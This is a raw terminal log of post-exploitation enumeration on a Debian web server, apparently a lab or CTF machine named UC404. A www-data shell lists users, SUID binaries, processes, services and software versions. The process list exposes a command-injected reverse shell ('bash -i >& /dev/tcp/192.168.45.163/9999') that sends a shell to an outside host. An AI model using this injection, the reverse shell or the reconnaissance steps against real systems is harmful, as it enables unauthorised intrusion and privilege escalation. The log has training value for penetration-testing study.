System/Kernel
www-data@UC404:/var/www/html/under_construction$ uname -a ; cat /etc/*release
Linux UC404 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"
x86_64
4.19.0-12-amd64
Debian 10 (buster)
Networks
www-data@UC404:/var/www/html/under_construction$ ip route ; arp -a
default via 192.168.125.254 dev ens192 onlink
192.168.125.0/24 dev ens192 proto kernel scope link src 192.168.125.109
? (192.168.125.254) at 00:50:56:9e:72:00 [ether] on ens192
www-data@UC404:/var/www/html/under_construction$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:49749 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:55767 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:40129 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:32873 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 141 192.168.125.109:57020 192.168.45.163:9999 ESTABLISHED 4826/bash
udp 0 0 127.0.0.1:35331 127.0.0.1:57011 ESTABLISHED -
udp 0 0 0.0.0.0:50797 0.0.0.0:* -
udp 0 0 0.0.0.0:47731 0.0.0.0:* -
udp 0 0 127.0.0.1:57011 127.0.0.1:35331 ESTABLISHED -
udp 0 0 0.0.0.0:42732 0.0.0.0:* -
udp 0 0 0.0.0.0:60304 0.0.0.0:* -
udp 0 0 0.0.0.0:2049 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:42190 0.0.0.0:* -
Users & Groups
www-data@UC404:/var/www/html/under_construction$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
_rpc:x:106:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:107:65534::/var/lib/nfs:/usr/sbin/nologin
brian:x:1001:1001:,,,:/home/brian:/bin/bash
total 12K
4.0K drwxr-xr-x 2 brian brian 4.0K Oct 27 2020 brian
4.0K drwxr-xr-x 3 root root 4.0K Oct 27 2020 .
4.0K drwxr-xr-x 18 root root 4.0K Oct 20 2020 ..
brian
www-data@UC404:/var/www/html/under_construction$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=106(_rpc) gid=65534(nogroup) groups=65534(nogroup)
uid=107(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=1001(brian) gid=1001(brian) groups=1001(brian)
uid=1001(brian) gid=1001(brian) groups=1001(brian)
SUIDs
www-data@UC404:/var/www/html/under_construction$ find / -type f -perm -04000 -ls 2>/dev/null
273373 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
276719 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
398815 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
280784 116 -rwsr-xr-x 1 root root 114784 Jun 24 2020 /usr/sbin/mount.nfs
266035 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
262183 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
265710 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
279097 36 -rwsr-xr-x 1 root root 34896 Apr 22 2020 /usr/bin/fusermount
266037 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
262179 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
262180 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
265563 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
269340 156 -rwsr-xr-x 1 root root 157192 Feb 2 2020 /usr/bin/sudo
262182 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
SGIDs
www-data@UC404:/var/www/html/under_construction$ find / -type f -perm -02000 -ls 2>/dev/null
262984 40 -rwxr-sr-x 1 root shadow 39616 Feb 14 2019 /usr/sbin/unix_chkpwd
273564 20 -rwxr-sr-x 1 root mail 18944 Dec 3 2017 /usr/bin/dotlockfile
262181 32 -rwxr-sr-x 1 root shadow 31000 Jul 27 2018 /usr/bin/expiry
276712 316 -rwxr-sr-x 1 root ssh 321672 Jan 31 2020 /usr/bin/ssh-agent
268064 16 -rwxr-sr-x 1 root tty 14736 May 4 2018 /usr/bin/bsd-write
262178 72 -rwxr-sr-x 1 root shadow 71816 Jul 27 2018 /usr/bin/chage
268184 44 -rwxr-sr-x 1 root crontab 43568 Oct 11 2019 /usr/bin/crontab
263608 36 -rwxr-sr-x 1 root tty 34896 Jan 10 2019 /usr/bin/wall
Capabilities
www-data@UC404:/var/www/html/under_construction$ /usr/sbin/getcap -r / 2>/dev/null
/usr/lib/squid/pinger = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
Processes
www-data@UC404:/var/www/html/under_construction$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.5 169400 10228 ? Ss 09:33 0:00 /sbin/init
root 258 0.0 0.4 32740 8872 ? Ss 09:33 0:00 /lib/systemd/systemd-journald
root 280 0.0 0.0 7688 216 ? Ss 09:33 0:00 /usr/sbin/blkmapd
root 285 0.0 0.2 22196 5172 ? Ss 09:33 0:00 /lib/systemd/systemd-udevd
root 313 0.0 0.0 9080 168 ? Ss 09:33 0:00 /usr/sbin/rpc.idmapd
systemd+ 396 0.0 0.3 93084 6528 ? Ssl 09:33 0:00 /lib/systemd/systemd-timesyncd
root 397 0.0 0.5 48220 10580 ? Ss 09:33 0:00 /usr/bin/VGAuthService
_rpc 398 0.0 0.1 6960 3728 ? Ss 09:33 0:00 /sbin/rpcbind -f -w
root 399 0.0 0.5 122876 12212 ? Ssl 09:33 0:06 /usr/bin/vmtoolsd
root 421 0.0 1.3 31864 27088 ? Ss 09:33 0:00 /usr/sbin/rpc.mountd --manage-gids
root 425 0.0 0.4 225824 8352 ? Ssl 09:33 0:00 /usr/sbin/rsyslogd -n -iNONE
message+ 426 0.0 0.2 9280 4584 ? Ss 09:33 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 430 0.0 0.3 19308 6412 ? Ss 09:33 0:00 /lib/systemd/systemd-logind
root 449 0.0 0.3 15852 6888 ? Ss 09:33 0:00 /usr/sbin/sshd -D
root 479 0.0 0.1 8504 2848 ? Ss 09:33 0:00 /usr/sbin/cron -f
root 484 0.0 0.0 5612 1608 tty1 Ss+ 09:33 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 554 0.0 0.5 71840 10552 ? Ss 09:33 0:00 /usr/sbin/squid -sYC
root 571 0.0 0.9 196792 19680 ? Ss 09:33 0:01 /usr/sbin/apache2 -k start
proxy 967 0.0 1.1 77140 23148 ? S 09:35 0:00 (squid-1) --kid squid-1 -sYC
proxy 968 0.0 0.0 5504 1624 ? S 09:35 0:00 (logfile-daemon) /var/log/squid/access.log
proxy 969 0.0 0.0 0 0 ? Z 09:35 0:00 [squid] <defunct>
www-data 4756 0.0 0.6 197304 13684 ? S 13:34 0:00 /usr/sbin/apache2 -k start
www-data 4760 0.0 0.4 197100 9968 ? S 13:34 0:00 /usr/sbin/apache2 -k start
www-data 4763 0.0 0.4 197100 9968 ? S 13:35 0:00 /usr/sbin/apache2 -k start
www-data 4818 0.0 0.4 197100 9968 ? S 13:42 0:00 /usr/sbin/apache2 -k start
www-data 4822 0.0 0.4 197100 9968 ? S 13:42 0:00 /usr/sbin/apache2 -k start
www-data 4823 0.0 0.0 2388 756 ? S 13:43 0:00 sh -c php sendmail.php &bash -c "bash -i >& /dev/tcp/192.168.45.163/9999 0>&1"
www-data 4825 0.0 0.1 3736 2836 ? S 13:43 0:00 bash -c bash -i >& /dev/tcp/192.168.45.163/9999 0>&1
www-data 4826 0.0 0.1 4000 3308 ? S 13:43 0:00 bash -i
www-data 4827 0.0 0.4 197100 9968 ? S 13:43 0:00 /usr/sbin/apache2 -k start
www-data 4877 0.0 0.1 7924 2796 ? R 13:49 0:00 ps -auxwww
root 280 0.0 0.0 7688 216 ? Ss 09:33 0:00 /usr/sbin/blkmapd
root 421 0.0 1.3 31864 27088 ? Ss 09:33 0:00 /usr/sbin/rpc.mountd --manage-gids
root 479 0.0 0.1 8504 2848 ? Ss 09:33 0:00 /usr/sbin/cron -f
root 554 0.0 0.5 71840 10552 ? Ss 09:33 0:00 /usr/sbin/squid -sYC
proxy 968 0.0 0.0 5504 1624 ? S 09:35 0:00 (logfile-daemon) /var/log/squid/access.log
Cron & Systemd
www-data@UC404:/var/www/html/under_construction$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sun 2025-02-23 14:09:00 EST 17min left Sun 2025-02-23 13:39:01 EST 12min ago phpsessionclean.timer phpsessionclean.service
Sun 2025-02-23 21:15:33 EST 7h left Sun 2025-02-23 09:35:28 EST 4h 16min ago apt-daily.timer apt-daily.service
Mon 2025-02-24 00:00:00 EST 10h left Sun 2025-02-23 09:35:28 EST 4h 16min ago logrotate.timer logrotate.service
Mon 2025-02-24 00:00:00 EST 10h left Sun 2025-02-23 09:35:28 EST 4h 16min ago man-db.timer man-db.service
Mon 2025-02-24 06:46:04 EST 16h left Sun 2025-02-23 09:35:28 EST 4h 16min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2025-02-24 09:48:15 EST 19h left Sun 2025-02-23 09:48:15 EST 4h 3min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
6 timers listed.
Pass --all to see loaded but inactive timers, too.
Services
www-data@UC404:/var/www/html/under_construction$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
apache2.service loaded active running The Apache HTTP Server
cron.service loaded active running Regular background program processing daemon
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
nfs-blkmap.service loaded active running pNFS block layout mapping daemon
nfs-idmapd.service loaded active running NFSv4 ID-name mapping service
nfs-mountd.service loaded active running NFS Mount Daemon
open-vm-tools.service loaded active running Service for virtual machines hosted on VMware
rpcbind.service loaded active running RPC bind portmap service
rsyslog.service loaded active running System Logging Service
squid.service loaded active running Squid Web Proxy Server
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
vgauth.service loaded active running Authentication service for virtual machines hosted on VMware
dbus.socket loaded active running D-Bus System Message Bus Socket
rpcbind.socket loaded active running RPCbind Server Activation Socket
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
27 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.
squid.service
Sudo Version
www-data@UC404:/var/www/html/under_construction$ sudo --version
Sudo version 1.8.27
Sudoers policy plugin version 1.8.27
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.27
Sudo version 1.8.27
Glibc Version
www-data@UC404:/var/www/html/under_construction$ ldd --version
ldd (Debian GLIBC 2.28-10) 2.28
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
ldd (Debian GLIBC 2.28-10) 2.28